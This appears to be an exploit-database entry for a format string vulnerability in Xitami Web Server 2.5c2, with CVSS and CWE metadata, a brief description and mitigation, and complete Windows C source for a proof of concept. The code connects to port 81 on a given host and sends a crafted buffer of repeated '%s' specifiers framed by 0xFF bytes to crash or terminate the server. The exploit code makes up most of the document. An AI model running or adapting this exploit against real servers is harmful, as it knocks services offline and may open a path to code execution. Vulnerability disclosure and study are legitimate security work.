Xitami Web Server v2.5c2 LRWP processing format string bug

vendor:

Xitami Web Server

by:

bratax

7.5

CVSS

HIGH

Format String

134

CWE

Product Name: Xitami Web Server

Affected Version From: 2.5c2

Affected Version To: 2.5c2

Patch Exists: NO

Related CWE:

CPE: a:xitami_web_server:xitami_web_server:2.5c2

Metasploit:

Other Scripts:

Platforms Tested: Windows (tested on WinXP Pro SP2 & Vista)

Unknown

Xitami Web Server v2.5c2 LRWP processing format string bug

This is a proof of concept exploit for the Xitami Web Server v2.5c2 LRWP processing format string bug. The exploit allows an attacker to crash the program or execute arbitrary code by sending a specially crafted format string request to the server. The vulnerability is caused by a lack of proper input validation and can be exploited by an attacker with remote access to the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Xitami Web Server or switch to a different web server software.

Source

Exploit-DB raw data:

/**
 *
 * PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug
 * Advisory is available at: http://www.bratax.be/advisories/b013.html
 * (multiple vulnerabilities! check it out!)
 *
 * @author: bratax
 * @url: http://www.bratax.be/
 * @email: bratax@gmail.com
 *
 * Thanks to BuzzDee for learning me how to use reverse code engineering to
 * find bugs & thanks to DiabloHorn as well ;-)
 * Greetz to NR!
 *
**/

#include <stdio.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")
#define PORT 81 // target port

int main(int argc, char *argv[]){

  int sockfd;
  struct hostent *he;
  struct sockaddr_in their_addr;
  WSADATA wsaData;
  char formatstring[250];

  if (argc != 2){
    printf("\nXitami Web Server 2.5c2\n" );
    printf("Format String PoC by bratax - http://www.bratax.be/\n\n");
    printf("[+] tested on WinXP Pro SP2 & Vista\n");
    printf("[+] usage: %s <hostname>\n\n", argv[0]);
    return -1;
  }

    if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
    fprintf(stderr, "WSAStartup failed.\n");
    return -1;
  }

  if ((he=gethostbyname(argv[1])) == NULL){  // get the host info
    perror("gethoscattbyname");
    return -1;
  }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    perror("socket");
    return -1;
  }

  their_addr.sin_family = AF_INET;  // host byte order
  their_addr.sin_port = htons(PORT);  // short, network byte order
  their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct

  if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1){
    printf("[-] Connect failed.\n");
    closesocket(sockfd);
    return -1;
  }

  printf("[+] Server is listening...\n");

  Sleep(1000);

  /*
    setup format string request:
              %s*100 + \xFF + somestring + \xFF     (program termination)
    or:
              %n + \xFF + somestring + \xFF         (program crash)
  */

  memset(formatstring,'\x41', sizeof(formatstring));
  for (int i = 0; i<200; i+=2){
    memcpy(formatstring+i, "%s", 2);
  }
  memcpy(formatstring+200, "\xFF", 1);
  memcpy(formatstring+249, "\xFF", 1);

  printf("[+] Sending format string request...");
  Sleep(2000);

  if (send(sockfd,formatstring,sizeof(formatstring),0) == -1) {
    Sleep(2000);
    printf("failed! Exiting...\n");
    closesocket(sockfd);
    WSACleanup();
    return -1;
  }

  Sleep(2000);
  closesocket(sockfd);
  printf("done.\n");


  return 0;
}

// milw0rm.com [2008-04-03]